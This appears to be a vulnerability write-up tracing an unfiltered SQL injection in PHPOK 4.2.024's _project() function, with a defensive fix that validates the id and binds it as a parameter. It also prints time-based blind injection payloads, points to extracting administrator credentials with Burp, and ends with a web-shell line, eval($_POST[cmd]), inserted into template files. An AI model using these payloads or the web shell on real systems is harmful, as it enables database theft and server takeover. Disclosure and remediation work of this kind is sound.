File /framework/www/post_control.php, lines 26-38:

    function index_f()
    {
        $id = $this->get('id');
        $pid = $this->get('pid');
        if (!$id && !$pid) {
            error(P_Lang('Unspecified item'), '', 'error');
        }
        $project_rs = $this->call->phpok('_project', array('phpok' => $id, 'pid' => $pid));
        if (!$project_rs || !$project_rs['module']) {
            error(P_Lang('Project does not meet the requirements'), '', 'error');
        }
The id and pid from the request are passed straight into
phpok('_project', array('phpok' => $id, 'pid' => $pid));
so follow the phpok() function:
/framework/phpok_call.php:

    function phpok($id, $rs = '')
    {
        if (!$id) return false;
        $cacheId = '';
        $content = '';
        if ($rs && is_string($rs)) parse_str($rs, $rs);
        // Determine whether caching is enabled; if so, read the cached result first
        if ($GLOBALS['app']->cache->status()) {
            $cacheId = $GLOBALS['app']->cache->key(array('id' => $id, 'rs' => $rs), $this->site['id'], 'call');
            $content = $GLOBALS['app']->cache->read($cacheId);
        }
        if ($content) return $content;
        // Determine whether a built-in call (id starting with '_') or a data-center call is requested
        if (substr($id, 0, 1) != '_') {
            $call_rs = $GLOBALS['app']->model('call')->get_rs($id, $this->site['id']);
            if (!$call_rs) return false;
            if ($call_rs['ext']) {
                $call_rs_ext = unserialize($call_rs['ext']);
                unset($call_rs['ext'], $call_rs['id']);
                if ($call_rs_ext) $call_rs = array_merge($call_rs_ext, $call_rs);
            }
            if ($rs && is_array($rs)) $call_rs = array_merge($call_rs, $rs);
        } else {
            if (!$rs || !is_array($rs)) return false;
            // arclist:  list of articles
            // arc:      single-article information
            // cate:     category information
            // catelist: category tree
            // project:  project information
            // sublist:  sub-project information
            // parent:   parent project information
            // plist:    sibling project information
            // fields:   field form
            // user:     member
            // userlist: member list
            // total:    number of articles
            // cate_id:  current category information (no items, no links generated)
            // subcate:  sub-category information, i.e. the sub-categories under the current category
            $list = array('arclist', 'arc', 'cate', 'catelist', 'project', 'sublist', 'parent', 'plist', 'fields', 'user', 'userlist', 'total', 'cate_id', 'subcate');
            // Strip the leading '_' to get the built-in call name
            $id = substr($id, 1);
            // If it is arclist and the is_list attribute is not defined, enable it by default
            if ($id == 'arclist') {
                $rs['is_list'] = $rs['is_list'] == 'false' ? 0 : 1;
            }
            if (!$id || !in_array($id, $list)) return false;
            $call_rs = array_merge($rs, array('type_id' => $id));
        }
        $content = $this->load_call($call_rs);
        if ($content && $cacheId) $GLOBALS['app']->cache->write($cacheId, $content);
        return $content;
    }
So phpok() is a dispatcher that ends up calling a function named after the id. Look again at
phpok('_project', array('phpok' => $id, 'pid' => $pid));
this lands in the _project function:
/framework/model/data.php, lines 1118-1139:

    public function _project($id, $ext = false)
    {
        if ($this->cdata['project'][$id]) {
            $rs = $this->cdata['project'][$id];
        } else {
            // $id is concatenated into the query without any filtering
            $sql = "SELECT * FROM " . $this->db->prefix . "project WHERE id=" . $id;
            $rs = $this->db->get_one($sql);
            if (!$this->cdata['project']) echo $id . '---' . $rs;
            $this->cdata['project'][$id] = $rs;
        }
        if (!$rs) return false;
        if ($ext) {
            $ext = $this->ext_all('project-' . $id);
            if ($ext) $rs = array_merge($ext, $rs);
        }
        return $rs;
    }
The id is not filtered at all and is concatenated directly into the SQL statement.
Http://127.0.0.1/phpok4.2.024/in ... amp;id=1&pid=41
This pid is the project id. On a default install the values start at 41 (41 included), and they can also be enumerated.
Http://127.0.0.1/phpok4.2.024/in ... Amp;id=1&pid=41and sleep (5)
The browser hangs for 5 seconds.
Http://127.0.0.1/phpok4.2.024/in Amp;id=1&pid=41and 1=if (ORD (substr (Database (),) =112), Sleep (5), 1)
This statement is self-explanatory: if the ASCII code of the first character of the database name is 112, the browser waits 5 seconds; otherwise the page returns immediately.
Taking this further: since the _project function itself is the problem, a global search for every call site of _project would turn up more places where the same flaw is reachable.
I did not test any further. The fix is to add filtering inside the _project function.
To obtain the administrator's account and password, run the injection through Burp.
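As an added example (not phpok's own code) of the fix just described, here is the unsafe concatenation from _project beside a version that validates the id and binds it as a query parameter. The table prefix, the sample pid values and the PDO handle in fetch_project() are constructed or assumed for this illustration.

```php
<?php
// Added example, not phpok's code: the vulnerable query builder beside a
// hardened one. Constructed sample pid values, including the time-based
// payload shown in the write-up.
$samples = ['41', '41and sleep(5)', '0', 'abc'];

// Vulnerable pattern: the request parameter is spliced into the SQL text,
// so "41and sleep(5)" becomes part of the statement.
function project_sql_unsafe(string $prefix, $id): string
{
    return "SELECT * FROM {$prefix}project WHERE id=" . $id;
}

// Hardened: accept only a positive integer id, otherwise return null.
// ctype_digit rejects "41and sleep(5)", "-1", "" and "4.2" outright
// (a plain (int) cast would silently turn "41and sleep(5)" into 41).
function validate_project_id($id): ?int
{
    if (!is_string($id) && !is_int($id)) {
        return null;
    }
    $s = (string) $id;
    if ($s === '' || !ctype_digit($s)) {
        return null;
    }
    $n = (int) $s;
    return $n > 0 ? $n : null;
}

// Hardened lookup: validated id plus a bound parameter, so the value can
// never alter the SQL text. $db is an assumed PDO connection.
function fetch_project(PDO $db, string $prefix, $rawId): ?array
{
    $id = validate_project_id($rawId);
    if ($id === null) {
        return null; // caller reports "Unspecified item", as post_control.php does
    }
    $stmt = $db->prepare("SELECT * FROM {$prefix}project WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

foreach ($samples as $pid) {
    printf("%-20s unsafe SQL : %s\n", var_export($pid, true), project_sql_unsafe('phpok_', $pid));
    printf("%-20s validated  : %s\n", '', var_export(validate_project_id($pid), true));
}
```

Running it shows the payload reaching the statement in the unsafe builder while validate_project_id() returns null for it, which is the check _project is missing.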
Backend getshell:
Style management lets you edit the template PHP files directly.
Insert `?><?php phpinfo(); ?><?` or `?><?php eval($_POST[cmd]); ?><?` into one of them.